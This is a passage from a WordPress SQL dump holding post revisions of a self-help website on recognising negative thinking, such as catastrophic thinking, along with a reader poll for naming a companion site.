-->\n\n<!-- wp:image {"align":"center","id":1883,"sizeSlug":"full","linkDestination":"none"} -->\n<figure class="wp-block-image aligncenter size-full"><img src="https://www.happythinking.com/wp-content/uploads/patternrecognition170623a.gif" alt="" class="wp-image-1883"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>When describing negative thinking, I will use certain examples to make things clear. However, to keep this website readable, I have often made these examples somewhat simplistic and they may not always exactly match your circumstances, so please add some imagination to make my examples more relevant to you.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Please note that in the first section of this website, I will not mention any of the mental methods that you can use to deal with negative thinking. It would make more sense to learn about them after you understand the various types of negative thinking, as then you will be able to better appreciate how to use the methods. So as you read about the types of negative thinking, please do not think that I have forgotten to tell you about the various methods! I promise I will share them with you later.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Finally do not try to understand and remember every type of negative thinking in one go. A lot of people think that by speed reading and clicking through pages, they would miraculously end up becoming happier. Unfortunately, by going too fast, the information will just bounce off oneâ€™s mind, rather than interacting with it.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {"align":"center","id":1885,"sizeSlug":"full","linkDestination":"none"} -->\n<figure class="wp-block-image aligncenter size-full"><img src="https://www.happythinking.com/wp-content/uploads/toofast_170623.jpg" alt="" class="wp-image-1885"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>Like lots of things, you need to go slow so that you can appreciate and digest knowledge. This website will always be there for you, so take as long as you like to read it. You are always welcome to keep visiting here.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Let''s move on to understand common types of negative thinking. Letâ€™s see how many will be relevant to you! In my case, I could recognise many of them in my own mind.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:buttons {"layout":{"type":"flex","justifyContent":"center","orientation":"horizontal"}} -->\n<div class="wp-block-buttons"><!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com" style="border-radius:15px">Prev</a></div>\n<!-- /wp:button -->\n\n<!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/negativity-effect/" style="border-radius:15px">Next</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"20px"} -->\n<div style="height:20px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:buttons {"align":"wide","layout":{"type":"flex","justifyContent":"center"}} -->\n<div class="wp-block-buttons alignwide"><!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}}} -->\n<div class="wp-block-button"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/" style="border-radius:15px">Home</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"30px"} -->\n<div style="height:30px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->', 'Introduction', '', 'inherit', 'closed', 'closed', '', '1034-revision-v1', '', '', '2023-07-03 10:18:33', '2023-07-03 10:18:33', '', 1034, 'https://www.happythinking.com/?p=2016', 0, 'revision', '', 0);
INSERT INTO `wpou_posts` VALUES
(2061, 1, '2023-08-08 15:21:09', '2023-08-08 15:21:09', '<!-- wp:paragraph -->\n<p>In our day-to-day lives, we all keep an eye out for things that may harm us. This assessment of the world around us for danger is essential for oneâ€™s â€œsurvivalâ€ and is built into our brains. Unfortunately, this system for assessing dangers can work in an exaggerated way in some people, leading to unhelpful thinking patterns happening in their minds. I will now explain one such unhelpful thinking pattern which psychologists call â€œcatastrophic thinkingâ€.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Let me use an example to explain â€œcatastrophic thinkingâ€. Imagine that a person, who we will call Susan, has a teenage daughter and that she is fifteen minutes beyond the time she usually arrives home from school. While many parents will start to be concerned when their child is late returning from school, Susan, because of her catastrophic thinking, straight away thinks of only the worst possible outcome. In this case, Susan immediately thinks, â€œOh no, my daughter must have met with a road traffic accident and may be bleeding to death at this very moment.â€ whereas, a parent without such thinking may think instead, â€œMaybe there is very heavy traffic on the roads, and the school bus may have got held up.â€</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In fact, with catastrophic thinking, the person may add further layers of â€œworst outcomeâ€ scenarios. Continuing from the example I just gave, the further added scenarios may go like this, â€œAnd with the loss of my daughter, I would become extremely depressed, making me lose my partner and job. I will end up being homeless and sleeping on the streetâ€. With such a catastrophic imagination, the person will undergo immense unnecessary stress, probably further compromising the person''s ability to think rationally. And all this stress happens without the person having any idea of what actually has happened.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>This is not to say that one should not be concerned about oneâ€™s children. Rather, it''s about having a measured level of concern. In the example, perhaps instead of imagining the worst, a better approach would have been to say look up online to see for traffic reports in the area etc.&nbsp;&nbsp;&nbsp;&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>A common theme that you will see when I discuss unhelpful thinking patterns is that it often has to do with one not â€œseeing things the way they really areâ€. What I mean is that our minds often â€œimagineâ€ an outcome and then treat that imagination as being true. i.e. it confuses imagination and truth. In the example given before, yes there was a reason for the person to be concerned that his or her daughter was late, but then the thinking became unhelpful when the person''s mind imagined that an accident must have happened, when in reality, at that point there was no evidence that anything bad had happened. An important part of happy thinking is about developing the ability to see things the way they are, rather than having an imaginary view. In the â€œtoolsâ€ section of this website I will give you some techniques to help you do this.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:buttons {"layout":{"type":"flex","justifyContent":"center","orientation":"horizontal"}} -->\n<div class="wp-block-buttons"><!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/negativity-effect/" style="border-radius:15px">Prev</a></div>\n<!-- /wp:button -->\n\n<!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/all-or-nothing-thinking/" style="border-radius:15px">Next</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"20px"} -->\n<div style="height:20px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:buttons {"align":"wide","layout":{"type":"flex","justifyContent":"center"}} -->\n<div class="wp-block-buttons alignwide"><!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}}} -->\n<div class="wp-block-button"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/" style="border-radius:15px">Home</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"30px"} -->\n<div style="height:30px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->', 'Catastrophic thinking', '', 'inherit', 'closed', 'closed', '', '1620-revision-v1', '', '', '2023-08-08 15:21:09', '2023-08-08 15:21:09', '', 1620, 'https://www.happythinking.com/?p=2061', 0, 'revision', '', 0),
(2020, 1, '2023-07-03 12:51:59', '2023-07-03 12:51:59', '<!-- wp:paragraph -->\n<p>First of all, welcome to this website where I will tell you about â€œHappy Thinkingâ€. The information I will present to you has certainly made me a happier person and I am very pleased to share it with you so that you can benefit from it as well.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:block {"ref":1910} /-->\n\n<!-- wp:paragraph -->\n<p>We all desire to be happy. Unfortunately, the world we live in is full of stress and problems, which at times can make it challenging to find happiness. Luckily, while we may not be able to always control the things happening around us, one thing we can control is how our minds â€œthinkâ€. Happiness is created by thoughts, so thinking in positive and useful ways can promote happiness in us.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {"align":"center","id":1782,"sizeSlug":"full","linkDestination":"none"} -->\n<figure class="wp-block-image aligncenter size-full"><img src="https://www.happythinking.com/wp-content/uploads/yellowunhappy_100623.jpg" alt="" class="wp-image-1782"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>On the other hand, thinking in negative and useless ways can push us into unhappiness. The â€œway we thinkâ€ is an immensely powerful determinant of our happiness.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>For example, imagine that two people, holding very good jobs, have been suddenly told that their company no longer needs them and that they will have to leave immediately. Both these people are now in an unfortunate situation where they will lose their generous salaries and perks.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>One of these people might think, â€œWell that was a great job, but that is no more. No point thinking of what I have lost, instead, I need to start job hunting as soon as possible so I can pay my household bills.â€</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>On the other hand, the other person might think, â€œHow terrible! Bad things only happen to me. I will never get another job. There is no point trying as the world is useless.â€</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In this example, you can see that both people had to face the same problem, but each had a markedly different way of â€œthinkingâ€ when dealing with the problem.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The first person had ways of thinking that were positive as they did not make the personâ€™s sadness worse. Rather, this personâ€™s helpful ways of thinking kept his or her mind in a state where it could effectively think about potential solutions. This personâ€™s positive outlook will help the person to move on and ultimately find a replacement job.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>On the other hand, the second personâ€™s thinking was negative and made a bad situation worse. This person may well spiral into depression, which itself may make finding another job difficult.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {"align":"center","id":1842,"sizeSlug":"full","linkDestination":"none"} -->\n<figure class="wp-block-image aligncenter size-full"><img src="https://www.happythinking.com/wp-content/uploads/drowning_160623.jpg" alt="" class="wp-image-1842"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>â€œHappy Thinkingâ€ is about changing oneâ€™s negative thinking so that one can, despite the challenges around oneself, be in a state of happiness. To help one to achieve this in a logical manner, I have divided this website about Happy Thinking into two main sections.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In the first section, I will describe, in an easy-to-understand way, common types of negative thinking that people do. This will help one to recognise such thinking when it happens in oneâ€™s mind.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In the second section, I will describe various mental methods that oneâ€™s mind can use to change negative thinking. I like to think of such methods as â€œtoolsâ€, and just like a repairman will use various tools to repair something, one will be able to use these methods to change oneâ€™s negative thinking. These â€œmethodsâ€ are very practical so that one will be able to use them in oneâ€™s daily life.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In between describing negative thinking and giving methods to change such thinking, I will also sprinkle bits of wisdom about happiness that I have gathered from various places. Such wisdom may help one to see the world in a more accepting and positive way. Happy thinking is about combining these ingredients to make one into a happy person.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {"align":"center","id":1868,"sizeSlug":"full","linkDestination":"none"} -->\n<figure class="wp-block-image aligncenter size-full"><img src="https://www.happythinking.com/wp-content/uploads/happycauldron170623.jpg" alt="" class="wp-image-1868"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>On the next pages (first section of this website), I will explain to you in an easy-to-understand way, common types of negative thinking that people do.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>As you learn about the common types of negative thinking, see which ones are applicable to you. It is very important to keep an open mind when learning about the various types of negative thinking. Think twice before assuming that you do not think in negative ways as your mind may try and convince itself (i.e. you) that it is a perfect thinker!&nbsp; You may also recognise such thinking in your friends and family. If you do, please tell them about this website!</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {"align":"center","id":1883,"sizeSlug":"full","linkDestination":"none"} -->\n<figure class="wp-block-image aligncenter size-full"><img src="https://www.happythinking.com/wp-content/uploads/patternrecognition170623a.gif" alt="" class="wp-image-1883"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>When describing negative thinking, I will use certain examples to make things clear. However, to keep this website readable, I have often made these examples somewhat simplistic and they may not always exactly match your circumstances, so please add some imagination to make my examples more relevant to you.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Please note that in the first section of this website, I will not mention any of the mental methods that you can use to deal with negative thinking. It would make more sense to learn about them after you understand the various types of negative thinking, as then you will be able to better appreciate how to use the methods. So as you read about the types of negative thinking, please do not think that I have forgotten to tell you about the various methods! I promise I will share them with you later.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Finally do not try to understand and remember every type of negative thinking in one go. A lot of people think that by speed reading and clicking through pages, they would miraculously end up becoming happier. Unfortunately, by going too fast, the information will just bounce off oneâ€™s mind, rather than interacting with it.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {"align":"center","id":1885,"sizeSlug":"full","linkDestination":"none"} -->\n<figure class="wp-block-image aligncenter size-full"><img src="https://www.happythinking.com/wp-content/uploads/toofast_170623.jpg" alt="" class="wp-image-1885"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>Like lots of things, you need to go slow so that you can appreciate and digest knowledge. This website will always be there for you, so take as long as you like to read it. You are always welcome to keep visiting here.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Let''s move on to understand common types of negative thinking. Letâ€™s see how many will be relevant to you! In my case, I could recognise many of them in my own mind.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:buttons {"layout":{"type":"flex","justifyContent":"center","orientation":"horizontal"}} -->\n<div class="wp-block-buttons"><!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com" style="border-radius:15px">Prev</a></div>\n<!-- /wp:button -->\n\n<!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/negativity-effect/" style="border-radius:15px">Next</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"20px"} -->\n<div style="height:20px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:buttons {"align":"wide","layout":{"type":"flex","justifyContent":"center"}} -->\n<div class="wp-block-buttons alignwide"><!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}}} -->\n<div class="wp-block-button"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/" style="border-radius:15px">Home</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"30px"} -->\n<div style="height:30px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->', 'Introduction', '', 'inherit', 'closed', 'closed', '', '1034-revision-v1', '', '', '2023-07-03 12:51:59', '2023-07-03 12:51:59', '', 1034, 'https://www.happythinking.com/?p=2020', 0, 'revision', '', 0),
(2019, 1, '2023-07-03 12:51:00', '2023-07-03 12:51:00', '<!-- wp:spacer {"height":"30px"} -->\n<div style="height:30px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:image {"align":"center","id":2017,"sizeSlug":"full","linkDestination":"none"} -->\n<figure class="wp-block-image aligncenter size-full"><img src="https://www.happythinking.com/wp-content/uploads/home_happythinking030723.jpg" alt="" class="wp-image-2017"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>A universal desire of all human beings is to be happy. However, this can be quite challenging to achieve in our modern world which is full of high demands and stress. This website can help you to be happy.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The way oneâ€™s mind does its â€œthinkingâ€ plays a very important role in oneâ€™s happiness. Over time, oneâ€™s mind may develop certain ways of thinking that can negatively affect oneâ€™s mental well-being. Such â€œnegative thinkingâ€ is very common and on this website, I will describe them to you in an easy-to-understand way so that you will be able to recognise such thinking if it were to happen in your own mind. I will also share with you various mental methods that will help you to change negative thinking into more positive ways of thinking. These methods will be very practical so that you can use them in your daily life.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In essence, Happy Thinking is about recognising and changing negative ways of thinking so that you will find happiness.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>This website is truly free for you to benefit from (i.e. there is nothing to buy, download, register, etc). My sincere hope is that it will bring you happiness.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Click the button below to start reading about Happy Thinking.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:buttons {"layout":{"type":"flex","justifyContent":"center"}} -->\n<div class="wp-block-buttons"><!-- wp:button {"style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link wp-element-button" href="https://www.happythinking.com/introduction/" style="border-radius:15px">Click to read</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"27px"} -->\n<div style="height:27px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->', 'Find happiness by changing negative thinking', '', 'inherit', 'closed', 'closed', '', '88-revision-v1', '', '', '2023-07-03 12:51:00', '2023-07-03 12:51:00', '', 88, 'https://www.happythinking.com/?p=2019', 0, 'revision', '', 0),
(2013, 1, '2023-07-03 09:59:29', '2023-07-03 09:59:29', '<!-- wp:spacer {"height":"30px"} -->\n<div style="height:30px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:image {"align":"center","id":1977,"sizeSlug":"full","linkDestination":"none"} -->\n<figure class="wp-block-image aligncenter size-full"><img src="https://www.happythinking.com/wp-content/uploads/home_happythinking270623.jpg" alt="" class="wp-image-1977"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>A universal desire of all human beings is to be happy. However, this can be quite challenging to achieve in our modern world which is full of high demands and stress. This website can help you to be happy.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The way oneâ€™s mind does its â€œthinkingâ€ plays a very important role in oneâ€™s happiness. Over time, oneâ€™s mind may develop certain ways of thinking that can negatively affect oneâ€™s mental well-being. Such â€œnegative thinkingâ€ is very common and on this website, I will describe them to you in an easy-to-understand way so that you will be able to recognise such thinking if it were to happen in your own mind. I will also share with you various mental methods that will help you to change negative thinking into more positive ways of thinking. These methods will be very practical so that you can use them in your daily life.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In essence, Happy Thinking is about recognising and changing negative ways of thinking so that you will find happiness.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>This website is truly free for you to benefit from (i.e. there is nothing to buy, download, register, etc). My sincere hope is that it will bring you happiness.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Click the button below to start reading about Happy Thinking.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:buttons {"layout":{"type":"flex","justifyContent":"center"}} -->\n<div class="wp-block-buttons"><!-- wp:button {"style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link wp-element-button" href="https://www.happythinking.com/introduction/" style="border-radius:15px">Click to read</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"27px"} -->\n<div style="height:27px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->', 'Find happiness by changing how you think', '', 'inherit', 'closed', 'closed', '', '88-revision-v1', '', '', '2023-07-03 09:59:29', '2023-07-03 09:59:29', '', 88, 'https://www.happythinking.com/?p=2013', 0, 'revision', '', 0),
(2011, 1, '2023-07-03 05:43:39', '2023-07-03 05:43:39', '<!-- wp:spacer {"height":"30px"} -->\n<div style="height:30px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:image {"align":"center","id":1977,"sizeSlug":"full","linkDestination":"none"} -->\n<figure class="wp-block-image aligncenter size-full"><img src="https://www.happythinking.com/wp-content/uploads/home_happythinking270623.jpg" alt="" class="wp-image-1977"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>A universal desire of all human beings is to be happy. However, this can be quite challenging to achieve in our modern world which is full of high demands and stress. This website can help you to be happy.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The way oneâ€™s mind does its â€œthinkingâ€ plays a very important role in oneâ€™s happiness. Over time, oneâ€™s mind may develop certain ways of thinking that can negatively affect oneâ€™s mental well-being. Such â€œnegative thinkingâ€ is very common and on this website, I will describe them to you in an easy-to-understand way so that you will be able to recognise such thinking if it were to happen in your own mind. I will also share with you various mental methods that will help you to change negative thinking into more positive ways of thinking. These methods will be very practical so that you can use them in your daily life.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In essence, Happy Thinking is about recognising and changing negative ways of thinking so that you will find happiness.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:block {"ref":1910} /-->\n\n<!-- wp:paragraph -->\n<p>This website is truly free for you to benefit from (i.e. there is nothing to buy, download, register, etc). My sincere hope is that it will bring you happiness.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Click the button below to start reading about Happy Thinking.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:buttons {"layout":{"type":"flex","justifyContent":"center"}} -->\n<div class="wp-block-buttons"><!-- wp:button {"style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link wp-element-button" href="https://www.happythinking.com/introduction/" style="border-radius:15px">Click to read</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"27px"} -->\n<div style="height:27px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->', 'Find happiness by changing how you think', '', 'inherit', 'closed', 'closed', '', '88-revision-v1', '', '', '2023-07-03 05:43:39', '2023-07-03 05:43:39', '', 88, 'https://www.happythinking.com/?p=2011', 0, 'revision', '', 0),
(2014, 1, '2023-07-03 10:10:38', '2023-07-03 10:10:38', '<!-- wp:separator {"className":"is-style-wide"} -->\n<hr class="wp-block-separator has-alpha-channel-opacity is-style-wide"/>\n<!-- /wp:separator -->\n\n<!-- wp:paragraph -->\n<p>Hello! I am the author of this website. I will be grateful for a small favour (not money!) that will take you only a few seconds. Apart from this website, I also want to make a website which will have a story in which a wise monk advises a person on how to be happy. I need to choose a nice name for the website that will have this story. I have managed to purchase the website names shown below, but am not sure which one is best. I will be grateful if you will help me to decide which name to use by selecting the name below that you think is better and clicking the submit button. Your choice will be anonymously recorded and will really help me to decide. Thank you!</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:shortcode -->\n[yop_poll id="1"]\n<!-- /wp:shortcode -->\n\n<!-- wp:separator {"className":"is-style-wide"} -->\n<hr class="wp-block-separator has-alpha-channel-opacity is-style-wide"/>\n<!-- /wp:separator -->', 'survey', '', 'inherit', 'closed', 'closed', '', '1910-revision-v1', '', '', '2023-07-03 10:10:38', '2023-07-03 10:10:38', '', 1910, 'https://www.happythinking.com/?p=2014', 0, 'revision', '', 0),
(2008, 1, '2023-07-02 20:47:36', '2023-07-02 20:47:36', '<!-- wp:separator {"className":"is-style-wide"} -->\n<hr class="wp-block-separator has-alpha-channel-opacity is-style-wide"/>\n<!-- /wp:separator -->\n\n<!-- wp:paragraph -->\n<p>Hello! I am the author of this website. Before you proceed with this free website on happy thinking, I will be grateful for a small favour (not money!) that will take you only a few seconds! Apart from this website, I also want to make a website which will have a story in which a wise monk guides a person towards happiness. I need to choose a nice name for the website that will have this story. I have managed to purchase the website names shown below, but am not sure which one is best. I will be grateful if you will help me to decide which name to use by selecting the name below that you think is better and then clicking the submit button. Your choice will really help me to decide which name to use.Thank you.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:shortcode -->\n[yop_poll id="1"]\n<!-- /wp:shortcode -->\n\n<!-- wp:separator {"className":"is-style-wide"} -->\n<hr class="wp-block-separator has-alpha-channel-opacity is-style-wide"/>\n<!-- /wp:separator -->', 'survey', '', 'inherit', 'closed', 'closed', '', '1910-revision-v1', '', '', '2023-07-02 20:47:36', '2023-07-02 20:47:36', '', 1910, 'https://www.happythinking.com/?p=2008', 0, 'revision', '', 0),
(2012, 1, '2023-07-03 05:44:18', '2023-07-03 05:44:18', '<!-- wp:paragraph -->\n<p>First of all, welcome to this website where I will tell you about â€œHappy Thinkingâ€. The information I will present to you has certainly made me a happier person and I am very pleased to share it with you so that you can benefit from it as well.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>We all desire to be happy. Unfortunately, the world we live in is full of stress and problems, which at times can make it challenging to find happiness. Luckily, while we may not be able to always control the things happening around us, one thing we can control is how our minds â€œthinkâ€. Happiness is created by thoughts, so thinking in positive and useful ways can promote happiness in us.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {"align":"center","id":1782,"sizeSlug":"full","linkDestination":"none"} -->\n<figure class="wp-block-image aligncenter size-full"><img src="https://www.happythinking.com/wp-content/uploads/yellowunhappy_100623.jpg" alt="" class="wp-image-1782"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>On the other hand, thinking in negative and useless ways can push us into unhappiness. The â€œway we thinkâ€ is an immensely powerful determinant of our happiness.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>For example, imagine that two people, holding very good jobs, have been suddenly told that their company no longer needs them and that they will have to leave immediately. Both these people are now in an unfortunate situation where they will lose their generous salaries and perks.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>One of these people might think, â€œWell that was a great job, but that is no more. No point thinking of what I have lost, instead, I need to start job hunting as soon as possible so I can pay my household bills.â€</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>On the other hand, the other person might think, â€œHow terrible! Bad things only happen to me. I will never get another job. There is no point trying as the world is useless.â€</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In this example, you can see that both people had to face the same problem, but each had a markedly different way of â€œthinkingâ€ when dealing with the problem.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The first person had ways of thinking that were positive as they did not make the personâ€™s sadness worse. Rather, this personâ€™s helpful ways of thinking kept his or her mind in a state where it could effectively think about potential solutions. This personâ€™s positive outlook will help the person to move on and ultimately find a replacement job.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>On the other hand, the second personâ€™s thinking was negative and made a bad situation worse. This person may well spiral into depression, which itself may make finding another job difficult.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {"align":"center","id":1842,"sizeSlug":"full","linkDestination":"none"} -->\n<figure class="wp-block-image aligncenter size-full"><img src="https://www.happythinking.com/wp-content/uploads/drowning_160623.jpg" alt="" class="wp-image-1842"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>â€œHappy Thinkingâ€ is about changing oneâ€™s negative thinking so that one can, despite the challenges around oneself, be in a state of happiness. To help one to achieve this in a logical manner, I have divided this website about Happy Thinking into two main sections.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In the first section, I will describe, in an easy-to-understand way, common types of negative thinking that people do. This will help one to recognise such thinking when it happens in oneâ€™s mind.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In the second section, I will describe various mental methods that oneâ€™s mind can use to change negative thinking. I like to think of such methods as â€œtoolsâ€, and just like a repairman will use various tools to repair something, one will be able to use these methods to change oneâ€™s negative thinking. These â€œmethodsâ€ are very practical so that one will be able to use them in oneâ€™s daily life.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In between describing negative thinking and giving methods to change such thinking, I will also sprinkle bits of wisdom about happiness that I have gathered from various places. Such wisdom may help one to see the world in a more accepting and positive way. Happy thinking is about combining these ingredients to make one into a happy person.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {"align":"center","id":1868,"sizeSlug":"full","linkDestination":"none"} -->\n<figure class="wp-block-image aligncenter size-full"><img src="https://www.happythinking.com/wp-content/uploads/happycauldron170623.jpg" alt="" class="wp-image-1868"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>On the next pages (first section of this website), I will explain to you in an easy-to-understand way, common types of negative thinking that people do.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>As you learn about the common types of negative thinking, see which ones are applicable to you. It is very important to keep an open mind when learning about the various types of negative thinking. Think twice before assuming that you do not think in negative ways as your mind may try and convince itself (i.e. you) that it is a perfect thinker!&nbsp; You may also recognise such thinking in your friends and family. If you do, please tell them about this website!</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {"align":"center","id":1883,"sizeSlug":"full","linkDestination":"none"} -->\n<figure class="wp-block-image aligncenter size-full"><img 